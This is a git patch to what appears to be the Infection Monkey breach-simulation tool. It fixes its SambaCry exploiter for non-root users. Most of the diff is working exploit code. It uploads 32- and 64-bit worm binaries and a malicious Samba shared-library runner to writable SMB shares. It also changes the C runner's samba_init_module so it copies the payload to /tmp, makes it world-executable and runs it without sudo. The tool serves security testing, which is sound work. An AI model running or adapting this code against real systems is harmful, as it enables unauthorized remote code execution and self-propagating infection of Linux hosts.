From 65872d951878010fc3e6cbd8dd8606ed0febf16a Mon Sep 17 00:00:00 2001 From: Itay Mizeretz Date: Mon, 2 Oct 2017 17:11:51 +0300 Subject: [PATCH] Fix SambaCry not working for non-root user --- chaos_monkey/config.py | 18 +------- chaos_monkey/example.conf | 10 +---- chaos_monkey/exploit/sambacry.py | 42 +++++++++++++------ .../sambacry_monkey_runner/build.sh | 8 ++-- .../sambacry_monkey_runner/sc_monkey_runner.c | 17 +++++--- monkey_island/cc/services/config.py | 40 ------------------ 6 files changed, 46 insertions(+), 89 deletions(-) diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py index 5cbc8f7ba..6b49d3bb3 100644 --- a/chaos_monkey/config.py +++ b/chaos_monkey/config.py @@ -111,7 +111,7 @@ class Configuration(object): # dropper config ########################### - dropper_try_move_first = sys.argv[0].endswith(".exe") + dropper_try_move_first = True dropper_set_date = True dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll" dropper_date_reference_path_linux = '/bin/sh' @@ -260,22 +260,6 @@ class Configuration(object): sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home'] # Shares to not check if they're writable. sambacry_shares_not_to_check = ["IPC$", "print$"] - # Name of file which contains the monkey's commandline - sambacry_commandline_filename = "monkey_commandline.txt" - # Name of file which contains the runner's result - sambacry_runner_result_filename = "monkey_runner_result" - # SambaCry runner filename (32 bit) - sambacry_runner_filename_32 = "sc_monkey_runner32.so" - # SambaCry runner filename (64 bit) - sambacry_runner_filename_64 = "sc_monkey_runner64.so" - # Monkey filename on share (32 bit) - sambacry_monkey_filename_32 = "monkey32" - # Monkey filename on share (64 bit) - sambacry_monkey_filename_64 = "monkey64" - # Monkey copy filename on share (32 bit) - sambacry_monkey_copy_filename_32 = "monkey32_2" - # Monkey copy filename on share (64 bit) - sambacry_monkey_copy_filename_64 = "monkey64_2" # system info collection collect_system_info = True diff --git a/chaos_monkey/example.conf b/chaos_monkey/example.conf index 8a979d0fb..285bffd11 100644 --- a/chaos_monkey/example.conf +++ b/chaos_monkey/example.conf @@ -27,7 +27,7 @@ "kill_file_path_linux": "/var/run/monkey.not", "kill_file_path_windows": "%windir%\\monkey.not", - "dropper_try_move_first": false, + "dropper_try_move_first": true, "exploiter_classes": [ "SSHExploiter", "SmbExploiter", @@ -70,14 +70,6 @@ "sambacry_trigger_timeout": 5, "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], "sambacry_shares_not_to_check": ["IPC$", "print$"], - "sambacry_commandline_filename": "monkey_commandline.txt", - "sambacry_runner_result_filename": "monkey_runner_result", - "sambacry_runner_filename_32": "sc_monkey_runner32.so", - "sambacry_runner_filename_64": "sc_monkey_runner64.so", - "sambacry_monkey_filename_32": "monkey32", - "sambacry_monkey_filename_64": "monkey64", - "sambacry_monkey_copy_filename_32": "monkey32_2", - "sambacry_monkey_copy_filename_64": "monkey64_2", "local_network_scan": false, "tcp_scan_get_banner": true, "tcp_scan_interval": 200, diff --git a/chaos_monkey/exploit/sambacry.py b/chaos_monkey/exploit/sambacry.py index 1fc0eaf12..4bebbd6a1 100644 --- a/chaos_monkey/exploit/sambacry.py +++ b/chaos_monkey/exploit/sambacry.py @@ -33,6 +33,23 @@ class SambaCryExploiter(HostExploiter): """ _target_os_type = ['linux'] + # Name of file which contains the monkey's commandline + SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt" + # Name of file which contains the runner's result + SAMBACRY_RUNNER_RESULT_FILENAME = "monkey_runner_result" + # SambaCry runner filename (32 bit) + SAMBACRY_RUNNER_FILENAME_32 = "sc_monkey_runner32.so" + # SambaCry runner filename (64 bit) + SAMBACRY_RUNNER_FILENAME_64 = "sc_monkey_runner64.so" + # Monkey filename on share (32 bit) + SAMBACRY_MONKEY_FILENAME_32 = "monkey32" + # Monkey filename on share (64 bit) + SAMBACRY_MONKEY_FILENAME_64 = "monkey64" + # Monkey copy filename on share (32 bit) + SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2" + # Monkey copy filename on share (64 bit) + SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2" + def __init__(self): self._config = __import__('config').WormConfiguration @@ -97,10 +114,9 @@ class SambaCryExploiter(HostExploiter): """ smb_client = self.connect_to_server(ip, creds) tree_id = smb_client.connectTree(share) - file_list = [self._config.sambacry_commandline_filename, self._config.sambacry_runner_result_filename, - self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64, - self._config.sambacry_monkey_filename_32, self._config.sambacry_monkey_filename_64, - self._config.sambacry_monkey_copy_filename_32, self._config.sambacry_monkey_copy_filename_64] + file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME, + self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64, + self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64] for filename in file_list: try: @@ -123,7 +139,7 @@ class SambaCryExploiter(HostExploiter): tree_id = smb_client.connectTree(share) file_content = None try: - file_id = smb_client.openFile(tree_id, "\\%s" % self._config.sambacry_runner_result_filename, + file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA) file_content = smb_client.readFile(tree_id, file_id) smb_client.closeFile(tree_id, file_id) @@ -251,22 +267,22 @@ class SambaCryExploiter(HostExploiter): with self.get_monkey_commandline_file(host, depth, self._config.dropper_target_path_linux) as monkey_commandline_file: - smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read) + smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read) with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file: - smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_32, monkey_runner_bin_file.read) + smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read) with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file: - smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_64, monkey_runner_bin_file.read) + smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read) monkey_bin_32_src_path = get_target_monkey_by_os(False, True) monkey_bin_64_src_path = get_target_monkey_by_os(False, False) with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file: - smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_32, monkey_bin_file.read) + smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read) with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file: - smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_64, monkey_bin_file.read) + smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read) smb_client.disconnectTree(tree_id) @@ -323,14 +339,14 @@ class SambaCryExploiter(HostExploiter): :return: Array of possible full paths to the module. """ sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess - file_names = [self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64] + file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64] return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)] def get_monkey_runner_bin_file(self, is_32bit): if is_32bit: - return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_32), "rb") + return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb") else: - return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb") + return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb") def get_monkey_commandline_file(self, host, depth, location): return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location)) diff --git a/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh b/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh index cc7640742..aba122d76 100644 --- a/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh +++ b/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh @@ -1,9 +1,9 @@ #!/usr/bin/env bash gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c -gcc -shared -m64 -o sc_monkey_runner_64.so sc_monkey_runner.o +gcc -shared -m64 -o sc_monkey_runner64.so sc_monkey_runner.o rm sc_monkey_runner.o -strip sc_monkey_runner_64.so +strip sc_monkey_runner64.so gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c -gcc -shared -m32 -o sc_monkey_runner_32.so sc_monkey_runner.o +gcc -shared -m32 -o sc_monkey_runner32.so sc_monkey_runner.o rm sc_monkey_runner.o -strip sc_monkey_runner_32.so \ No newline at end of file +strip sc_monkey_runner32.so \ No newline at end of file diff --git a/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c b/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c index e23d08f3a..65684fbf2 100644 --- a/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c +++ b/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c @@ -22,16 +22,16 @@ int samba_init_module(void) #ifdef ARCH_IS_64 const char RUNNER_FILENAME[] = "sc_monkey_runner64.so"; const char MONKEY_NAME[] = "monkey64"; - const char MONKEY_COPY_NAME[] = "monkey64_2"; #else const char RUNNER_FILENAME[] = "sc_monkey_runner32.so"; const char MONKEY_NAME[] = "monkey32"; - const char MONKEY_COPY_NAME[] = "monkey32_2"; #endif const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result"; const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt"; const int ACCESS_MODE = 0777; - const char RUN_MONKEY_CMD[] = "sudo ./"; + const char RUN_MONKEY_CMD[] = "./"; + const char MONKEY_DEST_FOLDER[] = "/tmp"; + const char MONKEY_DEST_NAME[] = "monkey"; int found = 0; char modulePathLine[LINE_MAX_LENGTH] = {'\0'}; @@ -102,7 +102,7 @@ int samba_init_module(void) // Build commandline strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1); - strncat(commandline, MONKEY_COPY_NAME, sizeof(MONKEY_COPY_NAME) - 1); + strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1); strncat(commandline, " ", 1); fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile); @@ -133,7 +133,12 @@ int samba_init_module(void) fread(monkeyBinary, 1, monkeySize, pFile); fclose(pFile); - pFile = fopen(MONKEY_COPY_NAME, "wb"); + if (0 != chdir(MONKEY_DEST_FOLDER)) + { + return 0; + } + + pFile = fopen(MONKEY_DEST_NAME, "wb"); if (NULL == pFile) { free(monkeyBinary); @@ -144,7 +149,7 @@ int samba_init_module(void) free(monkeyBinary); // Change monkey permissions - if (0 != chmod(MONKEY_COPY_NAME, ACCESS_MODE)) + if (0 != chmod(MONKEY_DEST_NAME, ACCESS_MODE)) { return 0; } diff --git a/monkey_island/cc/services/config.py b/monkey_island/cc/services/config.py index 0a89e4c4f..5e4d5abe0 100644 --- a/monkey_island/cc/services/config.py +++ b/monkey_island/cc/services/config.py @@ -587,46 +587,6 @@ SCHEMA = { "IPC$", "print$" ], "description": "These shares won't be checked when exploiting with SambaCry" - }, - "sambacry_commandline_filename": { - "title": "SambaCry commandline filename", - "type": "string", - "default": "monkey_commandline.txt", - }, - "sambacry_runner_result_filename": { - "title": "SambaCry runner result filename", - "type": "string", - "default": "monkey_runner_result", - }, - "sambacry_runner_filename_32": { - "title": "SambaCry runner filename (32 bit)", - "type": "string", - "default": "sc_monkey_runner32.so", - }, - "sambacry_runner_filename_64": { - "title": "SambaCry runner filename (64 bit)", - "type": "string", - "default": "sc_monkey_runner64.so", - }, - "sambacry_monkey_filename_32": { - "title": "SambaCry monkey filename (32 bit)", - "type": "string", - "default": "monkey32", - }, - "sambacry_monkey_filename_64": { - "title": "SambaCry monkey filename (64 bit)", - "type": "string", - "default": "monkey64", - }, - "sambacry_monkey_copy_filename_32": { - "title": "SambaCry monkey copy filename (32 bit)", - "type": "string", - "default": "monkey32_2", - }, - "sambacry_monkey_copy_filename_64": { - "title": "SambaCry monkey copy filename (64 bit)", - "type": "string", - "default": "monkey64_2", } } },